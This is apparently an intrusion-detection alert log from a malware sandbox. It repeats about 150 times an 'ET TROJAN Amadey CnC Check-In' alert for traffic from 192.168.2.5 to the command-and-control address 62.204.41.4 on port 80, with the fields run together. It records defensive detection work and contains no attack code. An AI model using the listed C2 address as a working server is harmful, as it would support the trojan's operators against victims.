                                                        192.168.2.562.204.41.449871802027700 02/06/23-14:17:37.725069TCP2027700ET TROJAN Amadey CnC Check-In4987180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449897802027700 02/06/23-14:17:44.164540TCP2027700ET TROJAN Amadey CnC Check-In4989780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449815802027700 02/06/23-14:17:21.391573TCP2027700ET TROJAN Amadey CnC Check-In4981580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450100802027700 02/06/23-14:18:39.335819TCP2027700ET TROJAN Amadey CnC Check-In5010080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449807802027700 02/06/23-14:17:19.395600TCP2027700ET TROJAN Amadey CnC Check-In4980780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450098802027700 02/06/23-14:18:38.869062TCP2027700ET TROJAN Amadey CnC Check-In5009880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449848802027700 02/06/23-14:17:29.531648TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450141802027700 02/06/23-14:18:50.069928TCP2027700ET TROJAN Amadey CnC Check-In5014180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449784802027700 02/06/23-14:17:07.177698TCP2027700ET TROJAN Amadey CnC Check-In4978480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450182802027700 02/06/23-14:19:00.788880TCP2027700ET TROJAN Amadey CnC Check-In5018280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450218802027700 02/06/23-14:19:11.381609TCP2027700ET TROJAN Amadey CnC Check-In5021880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450259802027700 02/06/23-14:19:21.359170TCP2027700ET TROJAN Amadey CnC Check-In5025980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450000802027700 02/06/23-14:18:11.377143TCP2027700ET TROJAN Amadey CnC Check-In5000080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449889802027700 02/06/23-14:17:42.087363TCP2027700ET TROJAN Amadey CnC Check-In4988980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449713802027700 02/06/23-14:16:34.634243TCP2027700ET TROJAN Amadey CnC Check-In4971380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450041802027700 02/06/23-14:18:22.955497TCP2027700ET TROJAN Amadey CnC Check-In5004180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450118802027700 02/06/23-14:18:43.766872TCP2027700ET TROJAN Amadey CnC Check-In5011880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450171802027700 02/06/23-14:18:58.166616TCP2027700ET TROJAN Amadey CnC Check-In5017180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449843802027700 02/06/23-14:17:28.350642TCP2027700ET TROJAN Amadey CnC Check-In4984380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449884802027700 02/06/23-14:17:40.878750TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450248802027700 02/06/23-14:19:18.703803TCP2027700ET TROJAN Amadey CnC Check-In5024880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449881802027700 02/06/23-14:17:40.148507TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450154802027700 02/06/23-14:18:54.119780TCP2027700ET TROJAN Amadey CnC Check-In5015480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450243802027700 02/06/23-14:19:17.486100TCP2027700ET TROJAN Amadey CnC Check-In5024380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449970802027700 02/06/23-14:18:03.894708TCP2027700ET TROJAN Amadey CnC Check-In4997080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449774802027700 02/06/23-14:17:04.719767TCP2027700ET TROJAN Amadey CnC Check-In4977480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450047802027700 02/06/23-14:18:24.370968TCP2027700ET TROJAN Amadey CnC Check-In5004780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449835802027700 02/06/23-14:17:26.426113TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449924802027700 02/06/23-14:17:50.645406TCP2027700ET TROJAN Amadey CnC Check-In4992480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450065802027700 02/06/23-14:18:28.913263TCP2027700ET TROJAN Amadey CnC Check-In5006580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450019802027700 02/06/23-14:18:17.663562TCP2027700ET TROJAN Amadey CnC Check-In5001980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450215802027700 02/06/23-14:19:10.669293TCP2027700ET TROJAN Amadey CnC Check-In5021580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449746802027700 02/06/23-14:16:57.847861TCP2027700ET TROJAN Amadey CnC Check-In4974680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449942802027700 02/06/23-14:17:57.083818TCP2027700ET TROJAN Amadey CnC Check-In4994280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450108802027700 02/06/23-14:18:41.274401TCP2027700ET TROJAN Amadey CnC Check-In5010880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450187802027700 02/06/23-14:19:01.971976TCP2027700ET TROJAN Amadey CnC Check-In5018780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449853802027700 02/06/23-14:17:30.867273TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449764802027700 02/06/23-14:17:02.319285TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450031802027700 02/06/23-14:18:20.511059TCP2027700ET TROJAN Amadey CnC Check-In5003180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450120802027700 02/06/23-14:18:44.246465TCP2027700ET TROJAN Amadey CnC Check-In5012080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450126802027700 02/06/23-14:18:45.717300TCP2027700ET TROJAN Amadey CnC Check-In5012680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449952802027700 02/06/23-14:17:59.609624TCP2027700ET TROJAN Amadey CnC Check-In4995280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450037802027700 02/06/23-14:18:21.991529TCP2027700ET TROJAN Amadey CnC Check-In5003780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449958802027700 02/06/23-14:18:01.022168TCP2027700ET TROJAN Amadey CnC Check-In4995880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450003802027700 02/06/23-14:18:13.453554TCP2027700ET TROJAN Amadey CnC Check-In5000380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449863802027700 02/06/23-14:17:35.672249TCP2027700ET TROJAN Amadey CnC Check-In4986380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450192802027700 02/06/23-14:19:03.186396TCP2027700ET TROJAN Amadey CnC Check-In5019280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449792802027700 02/06/23-14:17:12.357233TCP2027700ET TROJAN Amadey CnC Check-In4979280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449869802027700 02/06/23-14:17:37.244652TCP2027700ET TROJAN Amadey CnC Check-In4986980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449999802027700 02/06/23-14:18:11.060496TCP2027700ET TROJAN Amadey CnC Check-In4999980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450088802027700 02/06/23-14:18:36.403853TCP2027700ET TROJAN Amadey CnC Check-In5008880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450110802027700 02/06/23-14:18:41.820358TCP2027700ET TROJAN Amadey CnC Check-In5011080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450021802027700 02/06/23-14:18:18.134393TCP2027700ET TROJAN Amadey CnC Check-In5002180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450177802027700 02/06/23-14:18:59.607121TCP2027700ET TROJAN Amadey CnC Check-In5017780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450269802027700 02/06/23-14:19:23.777741TCP2027700ET TROJAN Amadey CnC Check-In5026980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449993802027700 02/06/23-14:18:09.446812TCP2027700ET TROJAN Amadey CnC Check-In4999380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450009802027700 02/06/23-14:18:15.225597TCP2027700ET TROJAN Amadey CnC Check-In5000980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449812802027700 02/06/23-14:17:20.620292TCP2027700ET TROJAN Amadey CnC Check-In4981280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449879802027700 02/06/23-14:17:39.657688TCP2027700ET TROJAN Amadey CnC Check-In4987980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449720802027700 02/06/23-14:16:38.844826TCP2027700ET TROJAN Amadey CnC Check-In4972080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449723802027700 02/06/23-14:16:39.562180TCP2027700ET TROJAN Amadey CnC Check-In4972380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449968802027700 02/06/23-14:18:03.426821TCP2027700ET TROJAN Amadey CnC Check-In4996880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449901802027700 02/06/23-14:17:45.128471TCP2027700ET TROJAN Amadey CnC Check-In4990180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450238802027700 02/06/23-14:19:16.271312TCP2027700ET TROJAN Amadey CnC Check-In5023880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450149802027700 02/06/23-14:18:52.948054TCP2027700ET TROJAN Amadey CnC Check-In5014980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449708802027700 02/06/23-14:16:33.047919TCP2027700ET TROJAN Amadey CnC Check-In4970880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450250802027700 02/06/23-14:19:19.184250TCP2027700ET TROJAN Amadey CnC Check-In5025080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450253802027700 02/06/23-14:19:19.903146TCP2027700ET TROJAN Amadey CnC Check-In5025380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450161802027700 02/06/23-14:18:55.790925TCP2027700ET TROJAN Amadey CnC Check-In5016180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449891802027700 02/06/23-14:17:42.583953TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450034802027700 02/06/23-14:18:21.257214TCP2027700ET TROJAN Amadey CnC Check-In5003480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450075802027700 02/06/23-14:18:33.288721TCP2027700ET TROJAN Amadey CnC Check-In5007580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450164802027700 02/06/23-14:18:56.510220TCP2027700ET TROJAN Amadey CnC Check-In5016480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449914802027700 02/06/23-14:17:48.241764TCP2027700ET TROJAN Amadey CnC Check-In4991480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449980802027700 02/06/23-14:18:06.304828TCP2027700ET TROJAN Amadey CnC Check-In4998080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449761802027700 02/06/23-14:17:01.580132TCP2027700ET TROJAN Amadey CnC Check-In4976180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449850802027700 02/06/23-14:17:30.084700TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450225802027700 02/06/23-14:19:13.073061TCP2027700ET TROJAN Amadey CnC Check-In5022580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449736802027700 02/06/23-14:16:52.079670TCP2027700ET TROJAN Amadey CnC Check-In4973680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449866802027700 02/06/23-14:17:36.501145TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449825802027700 02/06/23-14:17:23.920192TCP2027700ET TROJAN Amadey CnC Check-In4982580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449996802027700 02/06/23-14:18:10.162120TCP2027700ET TROJAN Amadey CnC Check-In4999680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450006802027700 02/06/23-14:18:14.489864TCP2027700ET TROJAN Amadey CnC Check-In5000680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449955802027700 02/06/23-14:18:00.317509TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450136802027700 02/06/23-14:18:48.120124TCP2027700ET TROJAN Amadey CnC Check-In5013680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449777802027700 02/06/23-14:17:05.460296TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450266802027700 02/06/23-14:19:23.059192TCP2027700ET TROJAN Amadey CnC Check-In5026680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450059802027700 02/06/23-14:18:27.376298TCP2027700ET TROJAN Amadey CnC Check-In5005980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450157802027700 02/06/23-14:18:54.822506TCP2027700ET TROJAN Amadey CnC Check-In5015780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450062802027700 02/06/23-14:18:28.208950TCP2027700ET TROJAN Amadey CnC Check-In5006280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449829802027700 02/06/23-14:17:24.880677TCP2027700ET TROJAN Amadey CnC Check-In4982980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449927802027700 02/06/23-14:17:51.554248TCP2027700ET TROJAN Amadey CnC Check-In4992780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449832802027700 02/06/23-14:17:25.693521TCP2027700ET TROJAN Amadey CnC Check-In4983280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450160802027700 02/06/23-14:18:55.547495TCP2027700ET TROJAN Amadey CnC Check-In5016080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449734802027700 02/06/23-14:16:51.611739TCP2027700ET TROJAN Amadey CnC Check-In4973480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450001802027700 02/06/23-14:18:11.711181TCP2027700ET TROJAN Amadey CnC Check-In5000180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450255802027700 02/06/23-14:19:20.388213TCP2027700ET TROJAN Amadey CnC Check-In5025580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449930802027700 02/06/23-14:17:53.103784TCP2027700ET TROJAN Amadey CnC Check-In4993080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449988802027700 02/06/23-14:18:08.271366TCP2027700ET TROJAN Amadey CnC Check-In4998880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449762802027700 02/06/23-14:17:01.814767TCP2027700ET TROJAN Amadey CnC Check-In4976280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450090802027700 02/06/23-14:18:36.931058TCP2027700ET TROJAN Amadey CnC Check-In5009080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449860802027700 02/06/23-14:17:33.773507TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449767802027700 02/06/23-14:17:03.053144TCP2027700ET TROJAN Amadey CnC Check-In4976780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450095802027700 02/06/23-14:18:38.133971TCP2027700ET TROJAN Amadey CnC Check-In5009580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450193802027700 02/06/23-14:19:03.417591TCP2027700ET TROJAN Amadey CnC Check-In5019380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449963802027700 02/06/23-14:18:02.243572TCP2027700ET TROJAN Amadey CnC Check-In4996380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449804802027700 02/06/23-14:17:18.644415TCP2027700ET TROJAN Amadey CnC Check-In4980480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450132802027700 02/06/23-14:18:47.164865TCP2027700ET TROJAN Amadey CnC Check-In5013280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449770802027700 02/06/23-14:17:03.784821TCP2027700ET TROJAN Amadey CnC Check-In4977080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449983802027700 02/06/23-14:18:07.033596TCP2027700ET TROJAN Amadey CnC Check-In4998380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449692802027700 02/06/23-14:16:29.077816TCP2027700ET TROJAN Amadey CnC Check-In4969280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450227802027700 02/06/23-14:19:13.545015TCP2027700ET TROJAN Amadey CnC Check-In5022780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450222802027700 02/06/23-14:19:12.337102TCP2027700ET TROJAN Amadey CnC Check-In5022280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449739802027700 02/06/23-14:16:52.782774TCP2027700ET TROJAN Amadey CnC Check-In4973980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450185802027700 02/06/23-14:19:01.492596TCP2027700ET TROJAN Amadey CnC Check-In5018580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449898802027700 02/06/23-14:17:44.411727TCP2027700ET TROJAN Amadey CnC Check-In4989880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450104802027700 02/06/23-14:18:40.328930TCP2027700ET TROJAN Amadey CnC Check-In5010480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449857802027700 02/06/23-14:17:31.816085TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449893802027700 02/06/23-14:17:43.066540TCP2027700ET TROJAN Amadey CnC Check-In4989380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449935802027700 02/06/23-14:17:55.397933TCP2027700ET TROJAN Amadey CnC Check-In4993580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449697802027700 02/06/23-14:16:30.331432TCP2027700ET TROJAN Amadey CnC Check-In4969780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450026802027700 02/06/23-14:18:19.334487TCP2027700ET TROJAN Amadey CnC Check-In5002680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450067802027700 02/06/23-14:18:29.442348TCP2027700ET TROJAN Amadey CnC Check-In5006780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450263802027700 02/06/23-14:19:22.314339TCP2027700ET TROJAN Amadey CnC Check-In5026380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449754802027700 02/06/23-14:16:59.800602TCP2027700ET TROJAN Amadey CnC Check-In4975480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449852802027700 02/06/23-14:17:30.586454TCP2027700ET TROJAN Amadey CnC Check-In4985280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450082802027700 02/06/23-14:18:34.947434TCP2027700ET TROJAN Amadey CnC Check-In5008280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449840802027700 02/06/23-14:17:27.625203TCP2027700ET TROJAN Amadey CnC Check-In4984080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450079802027700 02/06/23-14:18:34.225155TCP2027700ET TROJAN Amadey CnC Check-In5007980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450202802027700 02/06/23-14:19:05.591074TCP2027700ET TROJAN Amadey CnC Check-In5020280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450018802027700 02/06/23-14:18:17.421896TCP2027700ET TROJAN Amadey CnC Check-In5001880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450198802027700 02/06/23-14:19:04.619860TCP2027700ET TROJAN Amadey CnC Check-In5019880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450116802027700 02/06/23-14:18:43.292412TCP2027700ET TROJAN Amadey CnC Check-In5011680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449907802027700 02/06/23-14:17:46.566675TCP2027700ET TROJAN Amadey CnC Check-In4990780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449787802027700 02/06/23-14:17:07.919083TCP2027700ET TROJAN Amadey CnC Check-In4978780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449910802027700 02/06/23-14:17:47.301539TCP2027700ET TROJAN Amadey CnC Check-In4991080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449782802027700 02/06/23-14:17:06.679140TCP2027700ET TROJAN Amadey CnC Check-In4978280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449824802027700 02/06/23-14:17:23.678413TCP2027700ET TROJAN Amadey CnC Check-In4982480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450152802027700 02/06/23-14:18:53.649179TCP2027700ET TROJAN Amadey CnC Check-In5015280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449809802027700 02/06/23-14:17:19.879293TCP2027700ET TROJAN Amadey CnC Check-In4980980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450235802027700 02/06/23-14:19:15.519092TCP2027700ET TROJAN Amadey CnC Check-In5023580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449726802027700 02/06/23-14:16:43.296877TCP2027700ET TROJAN Amadey CnC Check-In4972680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450054802027700 02/06/23-14:18:26.116806TCP2027700ET TROJAN Amadey CnC Check-In5005480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450137802027700 02/06/23-14:18:48.518586TCP2027700ET TROJAN Amadey CnC Check-In5013780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449902802027700 02/06/23-14:17:45.366776TCP2027700ET TROJAN Amadey CnC Check-In4990280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450230802027700 02/06/23-14:19:14.260159TCP2027700ET TROJAN Amadey CnC Check-In5023080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449865802027700 02/06/23-14:17:36.266770TCP2027700ET TROJAN Amadey CnC Check-In4986580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449718802027700 02/06/23-14:16:38.360119TCP2027700ET TROJAN Amadey CnC Check-In4971880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449943802027700 02/06/23-14:17:57.392402TCP2027700ET TROJAN Amadey CnC Check-In4994380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450271802027700 02/06/23-14:19:24.244810TCP2027700ET TROJAN Amadey CnC Check-In5027180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449790802027700 02/06/23-14:17:11.646769TCP2027700ET TROJAN Amadey CnC Check-In4979080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450087802027700 02/06/23-14:18:36.155229TCP2027700ET TROJAN Amadey CnC Check-In5008780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450129802027700 02/06/23-14:18:46.436570TCP2027700ET TROJAN Amadey CnC Check-In5012980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450046802027700 02/06/23-14:18:24.134243TCP2027700ET TROJAN Amadey CnC Check-In5004680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449873802027700 02/06/23-14:17:38.196581TCP2027700ET TROJAN Amadey CnC Check-In4987380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449759802027700 02/06/23-14:17:01.035713TCP2027700ET TROJAN Amadey CnC Check-In4975980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449795802027700 02/06/23-14:17:14.968804TCP2027700ET TROJAN Amadey CnC Check-In4979580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449878802027700 02/06/23-14:17:39.400319TCP2027700ET TROJAN Amadey CnC Check-In4987880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449837802027700 02/06/23-14:17:26.897782TCP2027700ET TROJAN Amadey CnC Check-In4983780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450165802027700 02/06/23-14:18:56.744687TCP2027700ET TROJAN Amadey CnC Check-In5016580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450124802027700 02/06/23-14:18:45.227691TCP2027700ET TROJAN Amadey CnC Check-In5012480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450207802027700 02/06/23-14:19:06.819268TCP2027700ET TROJAN Amadey CnC Check-In5020780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449722802027700 02/06/23-14:16:39.327484TCP2027700ET TROJAN Amadey CnC Check-In4972280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449820802027700 02/06/23-14:17:22.659076TCP2027700ET TROJAN Amadey CnC Check-In4982080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449976802027700 02/06/23-14:18:05.318607TCP2027700ET TROJAN Amadey CnC Check-In4997680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449719802027700 02/06/23-14:16:38.598088TCP2027700ET TROJAN Amadey CnC Check-In4971980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449808802027700 02/06/23-14:17:19.636621TCP2027700ET TROJAN Amadey CnC Check-In4980880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449906802027700 02/06/23-14:17:46.332970TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449817802027700 02/06/23-14:17:21.886400TCP2027700ET TROJAN Amadey CnC Check-In4981780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450074802027700 02/06/23-14:18:33.054158TCP2027700ET TROJAN Amadey CnC Check-In5007480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449915802027700 02/06/23-14:17:48.482167TCP2027700ET TROJAN Amadey CnC Check-In4991580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450172802027700 02/06/23-14:18:58.399243TCP2027700ET TROJAN Amadey CnC Check-In5017280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450013802027700 02/06/23-14:18:16.193101TCP2027700ET TROJAN Amadey CnC Check-In5001380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450270802027700 02/06/23-14:19:24.011354TCP2027700ET TROJAN Amadey CnC Check-In5027080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449948802027700 02/06/23-14:17:58.606495TCP2027700ET TROJAN Amadey CnC Check-In4994880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450083802027700 02/06/23-14:18:35.186608TCP2027700ET TROJAN Amadey CnC Check-In5008380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450169802027700 02/06/23-14:18:57.700716TCP2027700ET TROJAN Amadey CnC Check-In5016980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449750802027700 02/06/23-14:16:58.814620TCP2027700ET TROJAN Amadey CnC Check-In4975080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450267802027700 02/06/23-14:19:23.304554TCP2027700ET TROJAN Amadey CnC Check-In5026780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449741802027700 02/06/23-14:16:53.261442TCP2027700ET TROJAN Amadey CnC Check-In4974180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450178802027700 02/06/23-14:18:59.843880TCP2027700ET TROJAN Amadey CnC Check-In5017880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450109802027700 02/06/23-14:18:41.581874TCP2027700ET TROJAN Amadey CnC Check-In5010980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450103802027700 02/06/23-14:18:40.079576TCP2027700ET TROJAN Amadey CnC Check-In5010380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450268802027700 02/06/23-14:19:23.543087TCP2027700ET TROJAN Amadey CnC Check-In5026880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449779802027700 02/06/23-14:17:05.941638TCP2027700ET TROJAN Amadey CnC Check-In4977980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449934802027700 02/06/23-14:17:55.067276TCP2027700ET TROJAN Amadey CnC Check-In4993480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449738802027700 02/06/23-14:16:52.550399TCP2027700ET TROJAN Amadey CnC Check-In4973880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450014802027700 02/06/23-14:18:16.436544TCP2027700ET TROJAN Amadey CnC Check-In5001480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449975802027700 02/06/23-14:18:05.084398TCP2027700ET TROJAN Amadey CnC Check-In4997580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450210802027700 02/06/23-14:19:07.790071TCP2027700ET TROJAN Amadey CnC Check-In5021080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450055802027700 02/06/23-14:18:26.352553TCP2027700ET TROJAN Amadey CnC Check-In5005580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450144802027700 02/06/23-14:18:51.746609TCP2027700ET TROJAN Amadey CnC Check-In5014480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450181802027700 02/06/23-14:19:00.557837TCP2027700ET TROJAN Amadey CnC Check-In5018180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449721802027700 02/06/23-14:16:39.081762TCP2027700ET TROJAN Amadey CnC Check-In4972180192.168.2.562.204.41.4
